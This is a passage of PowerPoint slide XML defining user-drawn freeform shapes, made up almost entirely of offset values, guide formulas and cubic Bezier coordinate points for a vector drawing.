              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="2920"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 173 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 201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7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3 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 67 h 209"/>
                  <a:gd name="T46" fmla="*/ 74 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 145 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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1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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="208"/>
                      <a:pt x="128" y="208"/>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3"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="198"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="193"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="154"/>
                      <a:pt x="23" y="149"/>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3"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="170"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="184"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="193"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="198"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="203"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="185"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="144"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="136"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="86"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="67"/>
                      <a:pt x="60" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="57"/>
                      <a:pt x="59" y="50"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="32"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="39"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="158"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="153"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="147"/>
                      <a:pt x="125" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="170"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="188"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="204"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="183"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="172"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="157"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="66"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="81"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="76"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="70"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="72"/>
                      <a:pt x="65" y="74"/>
                      <a:pt x="64" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="88"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="98"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="46"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0"/>
                      <a:pt x="38" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="137"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="166"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="174"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="185"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="193"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="182"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="185"/>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2"/>
                      <a:pt x="117" y="173"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="174"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="145"/>
                      <a:pt x="126" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="145"/>
                      <a:pt x="127" y="145"/>
                      <a:pt x="127" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="137"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="116"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="137"/>
                      <a:pt x="132" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="132"/>
                      <a:pt x="128" y="130"/>
                      <a:pt x="128" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="102"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="78"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="55"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="50"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="46"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="43"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="30"/>
                      <a:pt x="71" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="30"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="44"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="48"/>
